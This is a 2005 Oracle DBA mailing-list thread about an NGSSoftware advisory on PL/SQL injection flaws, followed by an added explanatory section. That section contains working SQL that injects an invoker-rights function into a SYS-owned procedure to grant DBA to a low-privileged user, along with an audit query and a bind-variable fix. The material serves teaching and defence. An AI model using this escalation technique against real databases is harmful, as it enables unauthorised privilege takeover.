From: "Ruth Gramolini" <rgramolini@tax.state.vt.us>
To: oracle-l
Subject: RE: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i
Date: Wed, 19 Jan 2005 09:44:58 -0500

I just got the email from Oracle about this. I guess it's real.
Ruth

-----Original Message-----
From: oracle-l-bounce@freelists.org [mailto:oracle-l-bounce@freelists.org] On Behalf Of Don Granaman
Sent: Wednesday, January 19, 2005 10:30 AM
To: rgramolini@tax.state.vt.us; oracle-l
Subject: Re: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i

This same "alert" was forwarded to me yesterday also. I could find no such patch - or any other related information on Metalink or OTN's security alerts. The most recent (unrelated) security alert I could find was from Dec 17, 2004.

-Don Granaman

----- Original Message -----
From: "Ruth Gramolini"
To: "oracle-l"
Sent: Tuesday, January 18, 2005 11:52 AM
Subject: FW: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i

> I just received this from my SA, Claus. Has anyone applied this patchset?
> Does anyone know the details?
>
> Inquiring minds want to know.
> Ruth
>
> -----Original Message-----
> From: Claus Lund [mailto:clund@tax.state.vt.us]
> Sent: Tuesday, January 18, 2005 11:30 AM
> To: Ruth Gramolini
> Subject: FW: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i
>
> I don't know if you heard about this yet...
>
> -Claus
>
> -----Original Message-----
> From: NGSSoftware Insight Security Research [mailto:nisr@nextgenss.com]
> Sent: Tuesday, January 18, 2005 10:33 AM
> To: bugtraq@securityfocus.com; ntbugtraq@listserv.ntbugtraq.com; vulnwatch@vulnwatch.org
> Subject: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i
>
> Researchers at NGSSoftware have discovered multiple high risk vulnerabilities in the Oracle Database Server. Versions affected include
>
> Oracle Database 10g - All Releases
> Oracle9i Database Server - All Releases
>
> The vulnerabilities include PL/SQL Injection vulnerabilities that allow low privileged users to gain DBA privileges and a buffer overflow vulnerability. The former can be exploited via the web through Oracle Application Server.
> Oracle has released a patch set (18/01/2005) to address these issues. Oracle database administrators are urged to download, test and install the patch set as soon as possible. See http://metalink.oracle.com/ for more details.
>
> NGSSoftware are going to withhold details about these flaws for three months. Full details will be published on the 18th of April 2005. This three month window will allow Oracle database administrators the time needed to test and apply the patch set before the details are released to the general public. This reflects NGSSoftware's new approach to responsible disclosure.
>
> NGSSQuirreL for Oracle, NGSSoftware's advanced vulnerability assessment scanner and security manager for Oracle, has been updated to check for and positively identify these flaws in Oracle database servers on the network. More information about NGSSQuirreL for Oracle can be found at http://www.ngssoftware.com/squirrelora.htm.
>
> NGSSoftware Insight Security Research
> http://www.ngssoftware.com/
> +44(0)208 401 0070

--
http://www.freelists.org/webpage/oracle-l
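The advisory quoted above names the class of bug (PL/SQL injection letting a low-privileged user reach DBA) but withholds the details. The following is an added illustration of how that class works in general, written for this page; it is not NGSSoftware's finding and not code from the list thread. Every object in it is hypothetical: a SYS-owned procedure `sys.lookup_obj` granted to PUBLIC, and a low-privileged user `scott` who holds only CREATE SESSION and CREATE PROCEDURE. The first query is the check a DBA can run today to see which SYS-owned packages PUBLIC may execute, which is where this class of flaw lives.

```sql
-- Added example (hypothetical objects); illustrates the PL/SQL injection
-- class named in the advisory, not the specific flaws it describes.

-- 0. Check: which SYS-owned procedures/packages can any user execute?
--    Each one that builds dynamic SQL from its arguments is a candidate.
SELECT table_name
  FROM dba_tab_privs
 WHERE grantee = 'PUBLIC' AND owner = 'SYS' AND privilege = 'EXECUTE';

-- 1. A hypothetical definer-rights procedure owned by SYS. The default
--    (no AUTHID clause) is definer rights, so the dynamic statement is
--    parsed and run in SYS's security context, and p_name is spliced
--    straight into it.
CREATE OR REPLACE PROCEDURE sys.lookup_obj (p_name IN VARCHAR2) AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM dba_objects WHERE object_name = ''' || p_name || ''''
    INTO l_cnt;
  DBMS_OUTPUT.PUT_LINE(l_cnt);
END;
/
GRANT EXECUTE ON sys.lookup_obj TO PUBLIC;

-- 2. The low-privileged user creates an invoker-rights function. Because it
--    is AUTHID CURRENT_USER, when SYS's procedure evaluates it the current
--    user is SYS, so the GRANT runs with SYS's privileges. The autonomous
--    transaction is what lets DDL run from inside a SELECT.
CREATE OR REPLACE FUNCTION scott.attack RETURN VARCHAR2
  AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO scott';
  COMMIT;
  RETURN 'x';
END;
/

-- 3. Inject a call to that function through the string parameter. The
--    statement SYS executes becomes:
--    SELECT COUNT(*) FROM dba_objects WHERE object_name = 'x' OR scott.attack = 'x'
BEGIN
  sys.lookup_obj('x'' OR scott.attack = ''x');
END;
/

-- 4. Hardened version: bind the value instead of concatenating it, so the
--    argument can never be parsed as SQL, and run with invoker rights so
--    the caller gains nothing from SYS owning the code. (ALL_OBJECTS
--    replaces DBA_OBJECTS because the caller now needs their own access.)
CREATE OR REPLACE PROCEDURE sys.lookup_obj_fixed (p_name IN VARCHAR2)
  AUTHID CURRENT_USER AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM all_objects WHERE object_name = :n'
    INTO l_cnt USING p_name;
  DBMS_OUTPUT.PUT_LINE(l_cnt);
END;
/
```

Two things in the pattern matter for triage. The privilege gain comes from the combination of definer rights, a PUBLIC execute grant and string concatenation into dynamic SQL; removing any one of the three closes this path, and the bind-variable form in step 4 is the one that survives code review. The attacker's side needs nothing beyond CREATE PROCEDURE, which is why the advisory can describe the victims as "low privileged users"; if that privilege is granted to application accounts that only ever need to call existing code, revoking it shrinks the population that could use a flaw of this class while a patch set is being tested.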